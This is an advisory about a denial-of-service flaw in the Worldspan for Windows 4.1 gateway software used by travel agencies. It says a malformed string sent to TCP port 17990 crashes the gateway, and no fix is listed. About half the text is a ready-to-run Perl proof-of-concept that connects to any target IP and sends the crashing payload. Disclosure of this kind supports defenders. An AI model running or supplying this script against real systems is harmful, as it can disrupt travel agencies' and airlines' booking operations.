COMMAND

	Worldspan DoS

SYSTEMS AFFECTED

	Worldspan for Windows 4.1 Gateway

PROBLEM

	altomo (nudehackers) [http://www.digitalgangsters.net/] says :
	

	Worldspan is one of the leading companies  which  creates  software  for
	use by  travel  agents.  Worldspan  software  is  used  by  many  travel
	agencies, airlines, and major travel websites. This adviosry focuses  on
	Res Manager (Worldspan for Windows 4.1). A user running Res  Manager  is
	connected to a  gateway  system  at  their  local  site  which  is  then
	connected to Worldspan via private lines or the internet. These  gateway
	systems are the middle man between the agents and Worldspan.
	

	The Worldspan gateways are normally windows 95 or 98 systems  which  run
	the gateway (gw) software and accept connections from  the  agents  then
	process these and send them to the Worldspan systems  via  private  line
	or the internet. The gw system uses tcp port 17990 to  communicate  with
	the agents. If a malformed is sent to this port the system will  attempt
	to process the it and eventually crash. From the research  thus  far  it
	seems the system uses  all  system  resources  trying  to  process  this
	packet and then crashes. In our lab the systems typically  crash  within
	1 minute.
	

	

	 Proof of Concept

	 ================

	

	#!/usr/bin/perl

	#altomo@digitalgangsters.net

	#Worldspan Gateway DoS

	

	$sabre = \"worldspanshouldgoboom\";

	

	use IO::Socket;

	$ip = \"$ARGV[0]\";

	$port = \"17990\";

	if ($#ARGV<0) {

	print \" useage: $0 <ip>\\n\";

	exit();

	}

	$socket = IO::Socket::INET->new(

	Proto=>\"tcp\",

	PeerAddr=>$ip,

	PeerPort=>$port,);

	

	

	print \"Worldspan Gateway DoS\\n\";

	print \"altomo\\@digitalgangsters.net\\n\";

	

	print \"Wait about a minute, and it should crash.\\n\";

	print $socket \"$sabre\\r\";

	close $socket;

	

SOLUTION

	None yet, see http://www.worldspan.com/